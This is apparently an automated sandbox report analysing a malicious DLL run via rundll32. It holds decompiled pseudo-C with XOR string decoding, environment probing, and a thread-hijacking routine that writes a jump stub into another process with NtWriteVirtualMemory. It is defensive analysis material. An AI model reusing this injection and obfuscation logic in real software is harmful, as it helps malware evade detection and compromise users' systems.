                                                                                                                                                                                                                                                                            						 *((intOrPtr*)(_t144 + 0x10c))(L"USERPROFILE", _t206, "TEMP");
                                                                                                                                                                                                                                                                            					}
                                                                                                                                                                                                                                                                            					_push(0x20a);
                                                                                                                                                                                                                                                                            					_t53 = _t199 + 0x122a; // 0x122a
                                                                                                                                                                                                                                                                            					_t155 = L"TEMP";
                                                                                                                                                                                                                                                                            					_t119 =  *0x10020fa0; // 0x466f8a0
                                                                                                                                                                                                                                                                            					_push(_t155);
                                                                                                                                                                                                                                                                            					if( *((intOrPtr*)(_t119 + 0xf0))() == 0) {
                                                                                                                                                                                                                                                                            						_t141 =  *0x10020fa0; // 0x466f8a0
                                                                                                                                                                                                                                                                            						 *((intOrPtr*)(_t141 + 0x10c))(_t155, _t206);
                                                                                                                                                                                                                                                                            					}
                                                                                                                                                                                                                                                                            					_push(0x40);
                                                                                                                                                                                                                                                                            					_t207 = L"SystemDrive";
                                                                                                                                                                                                                                                                            					_push( &_v144);
                                                                                                                                                                                                                                                                            					_t122 =  *0x10020fa0; // 0x466f8a0
                                                                                                                                                                                                                                                                            					_push(_t207);
                                                                                                                                                                                                                                                                            					if( *((intOrPtr*)(_t122 + 0xf0))() == 0) {
                                                                                                                                                                                                                                                                            						_t139 =  *0x10020fa0; // 0x466f8a0
                                                                                                                                                                                                                                                                            						 *((intOrPtr*)(_t139 + 0x10c))(_t207, L"C:");
                                                                                                                                                                                                                                                                            					}
                                                                                                                                                                                                                                                                            					_v8 = 0x7f;
                                                                                                                                                                                                                                                                            					_t61 = _t199 + 0x199c; // 0x199c
                                                                                                                                                                                                                                                                            					_t126 =  *0x10020fa0; // 0x466f8a0
                                                                                                                                                                                                                                                                            					 *((intOrPtr*)(_t126 + 0xc0))(_t61,  &_v8);
                                                                                                                                                                                                                                                                            					_t64 = _t199 + 0x100c; // 0x100c
                                                                                                                                                                                                                                                                            					E10014B0E(E1000E6E9(_t64, E1000CF09(_t64), 0),  &_v2644);
                                                                                                                                                                                                                                                                            					_t65 = _t199 + 0x1858; // 0x1858
                                                                                                                                                                                                                                                                            					E10014AE0( &_v2644, _t65, 0x20);
                                                                                                                                                                                                                                                                            					_push( &_v2644);
                                                                                                                                                                                                                                                                            					_push(0x1e);
                                                                                                                                                                                                                                                                            					_t68 = _t199 + 0x1878; // 0x1878
                                                                                                                                                                                                                                                                            					_t198 = 0x14;
                                                                                                                                                                                                                                                                            					E100096F3(_t68, _t198);
                                                                                                                                                                                                                                                                            					_t137 = E1000B5E5(_t68, _t198); // executed
                                                                                                                                                                                                                                                                            					 *((intOrPtr*)(_t199 + 0x1898)) = _t137;
                                                                                                                                                                                                                                                                            					return _t199;
                                                                                                                                                                                                                                                                            				}
                                                                                                                                                                                                                                                                            				return _t70;
                                                                                                                                                                                                                                                                            			}
























































                                                                                                                                                                                                                                                                            0x1000bc31
                                                                                                                                                                                                                                                                            0x1000bc3b
                                                                                                                                                                                                                                                                            0x1000bc47
                                                                                                                                                                                                                                                                            0x1000bc4c
                                                                                                                                                                                                                                                                            0x1000bc51
                                                                                                                                                                                                                                                                            0x1000bc5e
                                                                                                                                                                                                                                                                            0x1000bc64
                                                                                                                                                                                                                                                                            0x1000bc69
                                                                                                                                                                                                                                                                            0x1000bc6f
                                                                                                                                                                                                                                                                            0x1000bc7f
                                                                                                                                                                                                                                                                            0x1000bc84
                                                                                                                                                                                                                                                                            0x1000bc89
                                                                                                                                                                                                                                                                            0x1000bc89
                                                                                                                                                                                                                                                                            0x1000bc91
                                                                                                                                                                                                                                                                            0x1000bc96
                                                                                                                                                                                                                                                                            0x1000bc97
                                                                                                                                                                                                                                                                            0x1000bca1
                                                                                                                                                                                                                                                                            0x1000bcaa
                                                                                                                                                                                                                                                                            0x1000bcaa
                                                                                                                                                                                                                                                                            0x1000bcb0
                                                                                                                                                                                                                                                                            0x1000bcbd
                                                                                                                                                                                                                                                                            0x1000bcc2
                                                                                                                                                                                                                                                                            0x1000bcc8
                                                                                                                                                                                                                                                                            0x1000bcd1
                                                                                                                                                                                                                                                                            0x1000bcdf
                                                                                                                                                                                                                                                                            0x1000bce6
                                                                                                                                                                                                                                                                            0x1000bceb
                                                                                                                                                                                                                                                                            0x1000bceb
                                                                                                                                                                                                                                                                            0x1000bcec
                                                                                                                                                                                                                                                                            0x1000bcd3
                                                                                                                                                                                                                                                                            0x1000bcd3
                                                                                                                                                                                                                                                                            0x1000bcd3
                                                                                                                                                                                                                                                                            0x1000bcf2
                                                                                                                                                                                                                                                                            0x1000bcf8
                                                                                                                                                                                                                                                                            0x1000bcfd
                                                                                                                                                                                                                                                                            0x1000bd03
                                                                                                                                                                                                                                                                            0x1000bd08
                                                                                                                                                                                                                                                                            0x1000bd0e
                                                                                                                                                                                                                                                                            0x1000bd0e
                                                                                                                                                                                                                                                                            0x1000bd17
                                                                                                                                                                                                                                                                            0x1000bd1d
                                                                                                                                                                                                                                                                            0x1000bd21
                                                                                                                                                                                                                                                                            0x1000bd28
                                                                                                                                                                                                                                                                            0x1000bd2f
                                                                                                                                                                                                                                                                            0x1000bd36
                                                                                                                                                                                                                                                                            0x1000bd3a
                                                                                                                                                                                                                                                                            0x1000bd41
                                                                                                                                                                                                                                                                            0x1000bd42
                                                                                                                                                                                                                                                                            0x1000bd44
                                                                                                                                                                                                                                                                            0x1000bd49
                                                                                                                                                                                                                                                                            0x1000bd50
                                                                                                                                                                                                                                                                            0x1000bd52
                                                                                                                                                                                                                                                                            0x1000bd52
                                                                                                                                                                                                                                                                            0x1000bd58
                                                                                                                                                                                                                                                                            0x1000bd62
                                                                                                                                                                                                                                                                            0x1000bd67
                                                                                                                                                                                                                                                                            0x1000bd67
                                                                                                                                                                                                                                                                            0x1000bd72
                                                                                                                                                                                                                                                                            0x1000bd7f
                                                                                                                                                                                                                                                                            0x1000bd92
                                                                                                                                                                                                                                                                            0x1000bd81
                                                                                                                                                                                                                                                                            0x1000bd83
                                                                                                                                                                                                                                                                            0x1000bd83
                                                                                                                                                                                                                                                                            0x1000bd97
                                                                                                                                                                                                                                                                            0x1000bd9c
                                                                                                                                                                                                                                                                            0x1000bda2
                                                                                                                                                                                                                                                                            0x1000bda4
                                                                                                                                                                                                                                                                            0x1000bdad
                                                                                                                                                                                                                                                                            0x1000bdad
                                                                                                                                                                                                                                                                            0x1000bdb5
                                                                                                                                                                                                                                                                            0x1000bdba
                                                                                                                                                                                                                                                                            0x1000bdba
                                                                                                                                                                                                                                                                            0x1000bdc0
                                                                                                                                                                                                                                                                            0x1000bdcb
                                                                                                                                                                                                                                                                            0x1000bdd0
                                                                                                                                                                                                                                                                            0x1000bdd8
                                                                                                                                                                                                                                                                            0x1000bdde
                                                                                                                                                                                                                                                                            0x1000bde6
                                                                                                                                                                                                                                                                            0x1000bdf8
                                                                                                                                                                                                                                                                            0x1000bdfe
                                                                                                                                                                                                                                                                            0x1000be06
                                                                                                                                                                                                                                                                            0x1000be0b
                                                                                                                                                                                                                                                                            0x1000be18
                                                                                                                                                                                                                                                                            0x1000be29
                                                                                                                                                                                                                                                                            0x1000be2f
                                                                                                                                                                                                                                                                            0x1000be34
                                                                                                                                                                                                                                                                            0x1000be37
                                                                                                                                                                                                                                                                            0x1000be3a
                                                                                                                                                                                                                                                                            0x1000be47
                                                                                                                                                                                                                                                                            0x1000be4d
                                                                                                                                                                                                                                                                            0x1000be57
                                                                                                                                                                                                                                                                            0x1000be57
                                                                                                                                                                                                                                                                            0x1000be5d
                                                                                                                                                                                                                                                                            0x1000be65
                                                                                                                                                                                                                                                                            0x1000be70
                                                                                                                                                                                                                                                                            0x1000be75
                                                                                                                                                                                                                                                                            0x1000be7b
                                                                                                                                                                                                                                                                            0x1000be7d
                                                                                                                                                                                                                                                                            0x1000be8a
                                                                                                                                                                                                                                                                            0x1000be8b
                                                                                                                                                                                                                                                                            0x1000be8c
                                                                                                                                                                                                                                                                            0x1000be97
                                                                                                                                                                                                                                                                            0x1000be99
                                                                                                                                                                                                                                                                            0x1000bea0
                                                                                                                                                                                                                                                                            0x1000bea0
                                                                                                                                                                                                                                                                            0x1000beaa
                                                                                                                                                                                                                                                                            0x1000beaf
                                                                                                                                                                                                                                                                            0x1000beb4
                                                                                                                                                                                                                                                                            0x1000beb4
                                                                                                                                                                                                                                                                            0x1000beba
                                                                                                                                                                                                                                                                            0x1000bec1
                                                                                                                                                                                                                                                                            0x1000bec2
                                                                                                                                                                                                                                                                            0x1000becf
                                                                                                                                                                                                                                                                            0x1000bee2
                                                                                                                                                                                                                                                                            0x1000bee7
                                                                                                                                                                                                                                                                            0x1000beec
                                                                                                                                                                                                                                                                            0x1000bef5
                                                                                                                                                                                                                                                                            0x1000bef5
                                                                                                                                                                                                                                                                            0x1000befb
                                                                                                                                                                                                                                                                            0x1000bf00
                                                                                                                                                                                                                                                                            0x1000bf06
                                                                                                                                                                                                                                                                            0x1000bf0c
                                                                                                                                                                                                                                                                            0x1000bf11
                                                                                                                                                                                                                                                                            0x1000bf1a
                                                                                                                                                                                                                                                                            0x1000bf1c
                                                                                                                                                                                                                                                                            0x1000bf23
                                                                                                                                                                                                                                                                            0x1000bf23
                                                                                                                                                                                                                                                                            0x1000bf29
                                                                                                                                                                                                                                                                            0x1000bf31
                                                                                                                                                                                                                                                                            0x1000bf36
                                                                                                                                                                                                                                                                            0x1000bf37
                                                                                                                                                                                                                                                                            0x1000bf3c
                                                                                                                                                                                                                                                                            0x1000bf45
                                                                                                                                                                                                                                                                            0x1000bf47
                                                                                                                                                                                                                                                                            0x1000bf52
                                                                                                                                                                                                                                                                            0x1000bf52
                                                                                                                                                                                                                                                                            0x1000bf5b
                                                                                                                                                                                                                                                                            0x1000bf63
                                                                                                                                                                                                                                                                            0x1000bf6a
                                                                                                                                                                                                                                                                            0x1000bf6f
                                                                                                                                                                                                                                                                            0x1000bf7e
                                                                                                                                                                                                                                                                            0x1000bf96
                                                                                                                                                                                                                                                                            0x1000bf9d
                                                                                                                                                                                                                                                                            0x1000bfab
                                                                                                                                                                                                                                                                            0x1000bfb6
                                                                                                                                                                                                                                                                            0x1000bfb7
                                                                                                                                                                                                                                                                            0x1000bfbb
                                                                                                                                                                                                                                                                            0x1000bfc1
                                                                                                                                                                                                                                                                            0x1000bfc2
                                                                                                                                                                                                                                                                            0x1000bfca
                                                                                                                                                                                                                                                                            0x1000bfcf
                                                                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                                                                            0x1000bfd7
                                                                                                                                                                                                                                                                            0x1000bfdb

                                                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                                                            • GetCurrentProcessId.KERNEL32(?,?,00000000), ref: 1000BC58
                                                                                                                                                                                                                                                                            • GetLastError.KERNEL32(?,?,00000000), ref: 1000BD52
                                                                                                                                                                                                                                                                            • GetVersionExA.KERNEL32(00000000,?,?,00000000), ref: 1000BE3A
                                                                                                                                                                                                                                                                              • Part of subcall function 1000DD67: FindCloseChangeNotification.KERNELBASE(?,00001644,00000000,10000000), ref: 1000DE0B
                                                                                                                                                                                                                                                                            • GetWindowsDirectoryW.KERNEL32(00001020,00000104,?,?,00000000), ref: 1000BE65
                                                                                                                                                                                                                                                                            Strings
                                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                                            • Source File: 0000000F.00000002.393657520.0000000010001000.00000020.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true
                                                                                                                                                                                                                                                                            • Associated: 0000000F.00000002.393651974.0000000010000000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 0000000F.00000002.393691292.000000001001A000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 0000000F.00000002.393703600.000000001001F000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 0000000F.00000002.394711206.0000000010022000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_15_2_10000000_rundll32.jbxd
                                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                                            • API ID: ChangeCloseCurrentDirectoryErrorFindLastNotificationProcessVersionWindows
                                                                                                                                                                                                                                                                            • String ID: %s\%s$SystemDrive$TEMP$TEMP$USERPROFILE
                                                                                                                                                                                                                                                                            • API String ID: 3040727122-2706916422
                                                                                                                                                                                                                                                                            • Opcode ID: fbc1d6fbbc6ccd917195631cae4b8df202594f1322d43dd4a76b281c4d76eeaa
                                                                                                                                                                                                                                                                            • Instruction ID: 223de3120ca2146f2b08ea88d8ddf8a015e776c32fe29826ff6494a04fce2d39
                                                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: fbc1d6fbbc6ccd917195631cae4b8df202594f1322d43dd4a76b281c4d76eeaa
                                                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 49A18E35700616AFE714EF70DC89FEAB7E9FF08340F10016AF5099B656EB70AA458B91
                                                                                                                                                                                                                                                                            Uniqueness

                                                                                                                                                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                                            Control-flow Graph

                                                                                                                                                                                                                                                                            C-Code - Quality: 93%
                                                                                                                                                                                                                                                                            			_entry_(void* __ecx, void* __edx, intOrPtr _a4, WCHAR* _a8) {
                                                                                                                                                                                                                                                                            				void _v257;
                                                                                                                                                                                                                                                                            				char _v258;
                                                                                                                                                                                                                                                                            				char _v260;
                                                                                                                                                                                                                                                                            				short _v772;
                                                                                                                                                                                                                                                                            				intOrPtr _t21;
                                                                                                                                                                                                                                                                            				WCHAR* _t28;
                                                                                                                                                                                                                                                                            				long _t29;
                                                                                                                                                                                                                                                                            				char _t32;
                                                                                                                                                                                                                                                                            				char _t33;
                                                                                                                                                                                                                                                                            				int _t44;
                                                                                                                                                                                                                                                                            				void* _t48;
                                                                                                                                                                                                                                                                            				void* _t58;
                                                                                                                                                                                                                                                                            				int _t61;
                                                                                                                                                                                                                                                                            				intOrPtr* _t63;
                                                                                                                                                                                                                                                                            
                                                                                                                                                                                                                                                                            				_t48 = __ecx;
                                                                                                                                                                                                                                                                            				if(_a8 != 1) {
                                                                                                                                                                                                                                                                            					if(_a8 != 0) {
                                                                                                                                                                                                                                                                            						L11:
                                                                                                                                                                                                                                                                            						return 1;
                                                                                                                                                                                                                                                                            					}
                                                                                                                                                                                                                                                                            					_t21 =  *0x10020fa0; // 0x466f8a0
                                                                                                                                                                                                                                                                            					 *((intOrPtr*)(_t21 + 0xbc))(0xaa);
                                                                                                                                                                                                                                                                            					L3:
                                                                                                                                                                                                                                                                            					return 0;
                                                                                                                                                                                                                                                                            				}
                                                                                                                                                                                                                                                                            				E100091D2();
                                                                                                                                                                                                                                                                            				E100095AD();
                                                                                                                                                                                                                                                                            				 *0x10020fa8 = _a4;
                                                                                                                                                                                                                                                                            				 *0x10020fa4 = 1;
                                                                                                                                                                                                                                                                            				E1001443B(_a4);
                                                                                                                                                                                                                                                                            				 *_t63 = 0x14c; // executed
                                                                                                                                                                                                                                                                            				_t28 = E100091B2(_t48); // executed
                                                                                                                                                                                                                                                                            				_a8 = _t28;
                                                                                                                                                                                                                                                                            				_t29 = GetFileAttributesW(_t28); // executed
                                                                                                                                                                                                                                                                            				if(_t29 == 0xffffffff) {
                                                                                                                                                                                                                                                                            					E10009E2E( &_a8);
                                                                                                                                                                                                                                                                            					_t58 = 0x14;
                                                                                                                                                                                                                                                                            					_t61 = 0;
                                                                                                                                                                                                                                                                            					do {
                                                                                                                                                                                                                                                                            						_t32 =  *0x1001d868; // 0x6665
                                                                                                                                                                                                                                                                            						_v260 = _t32;
                                                                                                                                                                                                                                                                            						_t33 =  *0x1001d86a; // 0x0
                                                                                                                                                                                                                                                                            						_v258 = _t33;
                                                                                                                                                                                                                                                                            						memset( &_v257, 0, 0xfd);
                                                                                                                                                                                                                                                                            						memset( &_v772, 0, 0x200);
                                                                                                                                                                                                                                                                            						_t63 = _t63 + 0x18;
                                                                                                                                                                                                                                                                            						MultiByteToWideChar(0, 0,  &_v260, 0xffffffff,  &_v772, 0xff);
                                                                                                                                                                                                                                                                            						_t58 = _t58 - 1;
                                                                                                                                                                                                                                                                            					} while (_t58 != 0);
                                                                                                                                                                                                                                                                            					 *0x10020fa0 = E10009559(0x144, 0x26e);
                                                                                                                                                                                                                                                                            					_a8 =  *[fs:0x30];
                                                                                                                                                                                                                                                                            					if(_a8[1] == 0) {
                                                                                                                                                                                                                                                                            						L10:
                                                                                                                                                                                                                                                                            						goto L11;
                                                                                                                                                                                                                                                                            					}
                                                                                                                                                                                                                                                                            					_t44 = 0;
                                                                                                                                                                                                                                                                            					do {
                                                                                                                                                                                                                                                                            						 *(_t44 + 0x1001f820) =  *(_t44 + 0x1001f820) ^ 0x00000009;
                                                                                                                                                                                                                                                                            						_t44 = _t44 + 1;
                                                                                                                                                                                                                                                                            					} while (_t44 < 0x80);
                                                                                                                                                                                                                                                                            					do {
                                                                                                                                                                                                                                                                            						 *(_t61 + 0x1001f050) =  *(_t61 + 0x1001f050) ^ 0x000000aa;
                                                                                                                                                                                                                                                                            						_t61 = _t61 + 1;
                                                                                                                                                                                                                                                                            					} while (_t61 < 0x80);
                                                                                                                                                                                                                                                                            					goto L10;
                                                                                                                                                                                                                                                                            				}
                                                                                                                                                                                                                                                                            				E10009E2E( &_a8);
                                                                                                                                                                                                                                                                            				goto L3;
                                                                                                                                                                                                                                                                            			}

















                                                                                                                                                                                                                                                                            0x10001015
                                                                                                                                                                                                                                                                            0x10001025
                                                                                                                                                                                                                                                                            0x1000113d
                                                                                                                                                                                                                                                                            0x10001132
                                                                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                                                                            0x10001132
                                                                                                                                                                                                                                                                            0x1000113f
                                                                                                                                                                                                                                                                            0x10001149
                                                                                                                                                                                                                                                                            0x1000106f
                                                                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                                                                            0x1000106f
                                                                                                                                                                                                                                                                            0x1000102b
                                                                                                                                                                                                                                                                            0x10001030
                                                                                                                                                                                                                                                                            0x10001039
                                                                                                                                                                                                                                                                            0x1000103e
                                                                                                                                                                                                                                                                            0x10001044
                                                                                                                                                                                                                                                                            0x10001049
                                                                                                                                                                                                                                                                            0x10001050
                                                                                                                                                                                                                                                                            0x10001057
                                                                                                                                                                                                                                                                            0x1000105a
                                                                                                                                                                                                                                                                            0x10001066
                                                                                                                                                                                                                                                                            0x10001079
                                                                                                                                                                                                                                                                            0x10001081
                                                                                                                                                                                                                                                                            0x10001082
                                                                                                                                                                                                                                                                            0x10001084
                                                                                                                                                                                                                                                                            0x10001084
                                                                                                                                                                                                                                                                            0x1000108a
                                                                                                                                                                                                                                                                            0x10001091
                                                                                                                                                                                                                                                                            0x1000109b
                                                                                                                                                                                                                                                                            0x100010a9
                                                                                                                                                                                                                                                                            0x100010bb
                                                                                                                                                                                                                                                                            0x100010c0
                                                                                                                                                                                                                                                                            0x100010da
                                                                                                                                                                                                                                                                            0x100010e0
                                                                                                                                                                                                                                                                            0x100010e0
                                                                                                                                                                                                                                                                            0x100010fa
                                                                                                                                                                                                                                                                            0x10001105
                                                                                                                                                                                                                                                                            0x1000110f
                                                                                                                                                                                                                                                                            0x10001130
                                                                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                                                                            0x10001131
                                                                                                                                                                                                                                                                            0x10001111
                                                                                                                                                                                                                                                                            0x10001118
                                                                                                                                                                                                                                                                            0x10001118
                                                                                                                                                                                                                                                                            0x1000111f
                                                                                                                                                                                                                                                                            0x10001120
                                                                                                                                                                                                                                                                            0x10001124
                                                                                                                                                                                                                                                                            0x10001124
                                                                                                                                                                                                                                                                            0x1000112b
                                                                                                                                                                                                                                                                            0x1000112c
                                                                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                                                                            0x10001124
                                                                                                                                                                                                                                                                            0x10001069
                                                                                                                                                                                                                                                                            0x00000000

                                                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                                                              • Part of subcall function 100091D2: HeapCreate.KERNELBASE(00000000,00096000,00000000,10001030), ref: 100091DB
                                                                                                                                                                                                                                                                            • GetFileAttributesW.KERNELBASE(00000000), ref: 1000105A
                                                                                                                                                                                                                                                                            • memset.MSVCRT ref: 100010A9
                                                                                                                                                                                                                                                                            • memset.MSVCRT ref: 100010BB
                                                                                                                                                                                                                                                                            • MultiByteToWideChar.KERNEL32(00000000,00000000,?,000000FF,?,000000FF), ref: 100010DA
                                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                                            • Source File: 0000000F.00000002.393657520.0000000010001000.00000020.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true
                                                                                                                                                                                                                                                                            • Associated: 0000000F.00000002.393651974.0000000010000000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 0000000F.00000002.393691292.000000001001A000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 0000000F.00000002.393703600.000000001001F000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 0000000F.00000002.394711206.0000000010022000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_15_2_10000000_rundll32.jbxd
                                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                                            • API ID: memset$AttributesByteCharCreateFileHeapMultiWide
                                                                                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                                                                                            • API String ID: 371002992-0
                                                                                                                                                                                                                                                                            • Opcode ID: 28873a3474076a0a1097ffed1451b07b1029636ba8c8a1e835ed3268a5f7cc5d
                                                                                                                                                                                                                                                                            • Instruction ID: 590752042698cd2f4cdee0f974b65d0578b31557d413badee9f24b4b120a3a80
                                                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 28873a3474076a0a1097ffed1451b07b1029636ba8c8a1e835ed3268a5f7cc5d
                                                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: D531E6756003656FE720DF68CC49BDA77E9EB093A0F10816AF558CB1C6D774D981CB50
                                                                                                                                                                                                                                                                            Uniqueness

                                                                                                                                                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                                            Control-flow Graph

                                                                                                                                                                                                                                                                            • Executed
                                                                                                                                                                                                                                                                            • Not Executed
                                                                                                                                                                                                                                                                            control_flow_graph 179 1000a93e-1000a95c call 1000a51f 182 1000a962-1000a999 call 1000936a GetThreadContext 179->182 183 1000aa0e 179->183 182->183 187 1000a99b-1000a9b0 182->187 184 1000aa10-1000aa14 183->184 188 1000a9c2-1000a9c6 187->188 189 1000a9b2-1000a9c0 187->189 191 1000aa34-1000aa36 188->191 192 1000a9c8-1000a9cd 188->192 190 1000a9ce-1000aa0a NtProtectVirtualMemory NtWriteVirtualMemory 189->190 193 1000aa15-1000aa32 NtProtectVirtualMemory 190->193 194 1000aa0c 190->194 191->184 192->190 193->183 194->183
                                                                                                                                                                                                                                                                            C-Code - Quality: 100%
                                                                                                                                                                                                                                                                            			E1000A93E(void* __ecx, void** __edx, intOrPtr _a4, intOrPtr _a8) {
                                                                                                                                                                                                                                                                            				long _v8;
                                                                                                                                                                                                                                                                            				intOrPtr _v15;
                                                                                                                                                                                                                                                                            				void _v16;
                                                                                                                                                                                                                                                                            				long _v20;
                                                                                                                                                                                                                                                                            				void* _v24;
                                                                                                                                                                                                                                                                            				long _v28;
                                                                                                                                                                                                                                                                            				void* _v32;
                                                                                                                                                                                                                                                                            				struct _CONTEXT _v748;
                                                                                                                                                                                                                                                                            				void* _t34;
                                                                                                                                                                                                                                                                            				void _t43;
                                                                                                                                                                                                                                                                            				void* _t61;
                                                                                                                                                                                                                                                                            				long _t62;
                                                                                                                                                                                                                                                                            				void* _t65;
                                                                                                                                                                                                                                                                            				void** _t68;
                                                                                                                                                                                                                                                                            				void* _t69;
                                                                                                                                                                                                                                                                            
                                                                                                                                                                                                                                                                            				_t68 = __edx;
                                                                                                                                                                                                                                                                            				_t61 = __ecx;
                                                                                                                                                                                                                                                                            				_t34 = E1000A51F( *((intOrPtr*)(__edx)), _a4); // executed
                                                                                                                                                                                                                                                                            				_t69 = _t34;
                                                                                                                                                                                                                                                                            				if(_t69 == 0) {
                                                                                                                                                                                                                                                                            					L8:
                                                                                                                                                                                                                                                                            					return _t69;
                                                                                                                                                                                                                                                                            				}
                                                                                                                                                                                                                                                                            				E1000936A( &_v748, 0, 0x2cc);
                                                                                                                                                                                                                                                                            				_v748.ContextFlags = 0x10002;
                                                                                                                                                                                                                                                                            				if(GetThreadContext( *(__edx + 4),  &_v748) == 0) {
                                                                                                                                                                                                                                                                            					goto L8;
                                                                                                                                                                                                                                                                            				}
                                                                                                                                                                                                                                                                            				_v20 = _v20 & 0x00000000;
                                                                                                                                                                                                                                                                            				_t65 = _v748.Eax;
                                                                                                                                                                                                                                                                            				_t43 = _t69 - _a4 + _t61;
                                                                                                                                                                                                                                                                            				if(_a8 != 1) {
                                                                                                                                                                                                                                                                            					if(_a8 != 2) {
                                                                                                                                                                                                                                                                            						return 0;
                                                                                                                                                                                                                                                                            					}
                                                                                                                                                                                                                                                                            					_v16 = _t43;
                                                                                                                                                                                                                                                                            					_t62 = 8;
                                                                                                                                                                                                                                                                            					L6:
                                                                                                                                                                                                                                                                            					_v32 = _t65;
                                                                                                                                                                                                                                                                            					_v24 = _t65;
                                                                                                                                                                                                                                                                            					_v8 = _t62;
                                                                                                                                                                                                                                                                            					NtProtectVirtualMemory( *_t68,  &_v24,  &_v8, 4,  &_v20);
                                                                                                                                                                                                                                                                            					if(NtWriteVirtualMemory( *_t68, _v748.Eax,  &_v16, _t62,  &_v8) >= 0) {
                                                                                                                                                                                                                                                                            						_v28 = _v28 & 0x00000000;
                                                                                                                                                                                                                                                                            						NtProtectVirtualMemory( *_t68,  &_v32,  &_v8, _v20,  &_v28);
                                                                                                                                                                                                                                                                            					} else {
                                                                                                                                                                                                                                                                            						_t69 = 0;
                                                                                                                                                                                                                                                                            					}
                                                                                                                                                                                                                                                                            					goto L8;
                                                                                                                                                                                                                                                                            				}
                                                                                                                                                                                                                                                                            				_v16 = 0xe9;
                                                                                                                                                                                                                                                                            				_t62 = 5;
                                                                                                                                                                                                                                                                            				_v15 = _t43 - _t65 - _t62;
                                                                                                                                                                                                                                                                            				goto L6;
                                                                                                                                                                                                                                                                            			}


















                                                                                                                                                                                                                                                                            0x1000a94a
                                                                                                                                                                                                                                                                            0x1000a94c
                                                                                                                                                                                                                                                                            0x1000a953
                                                                                                                                                                                                                                                                            0x1000a958
                                                                                                                                                                                                                                                                            0x1000a95c
                                                                                                                                                                                                                                                                            0x1000aa0e
                                                                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                                                                            0x1000aa0e
                                                                                                                                                                                                                                                                            0x1000a970
                                                                                                                                                                                                                                                                            0x1000a978
                                                                                                                                                                                                                                                                            0x1000a999
                                                                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                                                                            0x1000a99b
                                                                                                                                                                                                                                                                            0x1000a9a4
                                                                                                                                                                                                                                                                            0x1000a9aa
                                                                                                                                                                                                                                                                            0x1000a9b0
                                                                                                                                                                                                                                                                            0x1000a9c6
                                                                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                                                                            0x1000aa34
                                                                                                                                                                                                                                                                            0x1000a9ca
                                                                                                                                                                                                                                                                            0x1000a9cd
                                                                                                                                                                                                                                                                            0x1000a9ce
                                                                                                                                                                                                                                                                            0x1000a9d1
                                                                                                                                                                                                                                                                            0x1000a9da
                                                                                                                                                                                                                                                                            0x1000a9e1
                                                                                                                                                                                                                                                                            0x1000a9ec
                                                                                                                                                                                                                                                                            0x1000aa0a
                                                                                                                                                                                                                                                                            0x1000aa15
                                                                                                                                                                                                                                                                            0x1000aa2f
                                                                                                                                                                                                                                                                            0x1000aa0c
                                                                                                                                                                                                                                                                            0x1000aa0c
                                                                                                                                                                                                                                                                            0x1000aa0c
                                                                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                                                                            0x1000aa0a
                                                                                                                                                                                                                                                                            0x1000a9b6
                                                                                                                                                                                                                                                                            0x1000a9ba
                                                                                                                                                                                                                                                                            0x1000a9bd
                                                                                                                                                                                                                                                                            0x00000000

                                                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                                                              • Part of subcall function 1000A51F: NtAllocateVirtualMemory.NTDLL(100043D8,00000000,00000000,?,00003000,00000040,?,00000000,100043D8,?,?,?,1000A958,?,00000000), ref: 1000A55A
                                                                                                                                                                                                                                                                              • Part of subcall function 1000936A: memset.MSVCRT ref: 1000937C
                                                                                                                                                                                                                                                                            • GetThreadContext.KERNELBASE(?,00010002,?,00000000,00000000), ref: 1000A991
                                                                                                                                                                                                                                                                            • NtProtectVirtualMemory.NTDLL(?,?,00000001,00000004,00000000,?,00000000,00000000), ref: 1000A9EC
                                                                                                                                                                                                                                                                            • NtWriteVirtualMemory.NTDLL(?,?,00000002,00000008,00000001,?,00000000,00000000), ref: 1000AA05
                                                                                                                                                                                                                                                                            • NtProtectVirtualMemory.NTDLL(?,?,00000001,00000000,00000000,?,00000000,00000000), ref: 1000AA2F
                                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                                            • Source File: 0000000F.00000002.393657520.0000000010001000.00000020.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true
